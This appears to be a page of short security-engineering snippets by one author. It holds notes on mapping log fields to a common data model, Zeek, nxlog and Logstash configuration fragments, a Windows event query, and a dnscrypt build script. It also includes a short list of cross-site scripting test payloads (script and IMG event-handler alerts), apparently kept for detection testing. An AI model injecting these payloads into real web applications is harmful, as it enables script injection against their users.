neu5ron

onboarding data sets, events, and logs

1. try to map as many fields from that log to the exisiting CDM entities
2. if a field does not map to an exisiting CDM, see if other log sources have similar values that could be possible to create a new CDM entity. additionally, it may be possible due to limit of the backend database or source where field can not be renamed then skip this.
3. if not enough for number 2 or the possibility that no other log source would ever have those values THEN a sub CDM (aka a CDM specific to that log source) should be created and documented for that log source. if that log source has values specific to itself, but those values are across multiple data/logs - then a sub entity (sub cdm) should be created. aka a custom entity for that log.

notes #TODO:organize

what is the purpose of OSSEM? are we still aligning to this? https://github.com/hunters-forge/OSSEM#goals

neu5ron

https://github.com/Cyb3rWard0g/HELK/releases/edit/untagged-6278864a41fc9304545c

neu5ron

based upon simulation from: https://github.com/OTRF/detection-hackathon-apt29

Understanding of Zeek Fields

use the following OSSEM branch

neu5ron

%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">

neu5ron

module HTTP;

# Add additional HTTP Headers
redef record Info += {
  #Origin "Origin"
  origin:       string  &log &optional;
};


event http_header(c: connection, is_orig: bool, name: string, value: string) &priority=5

neu5ron

#define ROOT C:\Program Files\nxlog
define ROOT C:\Program Files (x86)\nxlog

Moduledir %ROOT%\modules
CacheDir %ROOT%\data
Pidfile %ROOT%\data\nxlog.pid
SpoolDir %ROOT%\data
LogFile %ROOT%\data\nxlog.log

<Extension _json>

neu5ron

<QueryList>
  <Query Id="0" Path="Security">
    <Select Path="Security"> 
                 *[EventData[Data[@Name='ObjectName'] and (Data='C:\Users\Public\Documents\new-login-information.txt')]] 
                 and 
                 *[System[(EventID='4663')]] 
               </Select>
  </Query>
</QueryList>

neu5ron

filter {

    if [@meta][log][type] == "windows-wef" {

        # PowerShell Operational Only
        if [Channel] == "Microsoft-Windows-PowerShell/Operational" {

            # EventID 4103
            if [EventID] == 4103 {

neu5ron

sudo apt-get -y install build-essential checkinstall  automake libtool pkg-config;
wget -O libsodium.tar.gz https://download.libsodium.org/libsodium/releases/LATEST.tar.gz
mkdir libsodium && tar -zxvf libsodium.tar.gz -C libsodium --strip-components=1;
cd libsodium;
chmod +x configure && sh ./configure;
make;
sudo make install;
sudo ldconfig;
cd ../;
wget -O dnscrypt.tar.gz https://download.dnscrypt.org/dnscrypt-proxy/LATEST.tar.gz;

neu5ron

#define ROOT C:\Program Files\nxlog
define ROOT C:\Program Files (x86)\nxlog

Moduledir %ROOT%\modules
CacheDir %ROOT%\data
Pidfile %ROOT%\data\nxlog.pid
SpoolDir %ROOT%\data
LogFile %ROOT%\data\nxlog.log

<Extension _json>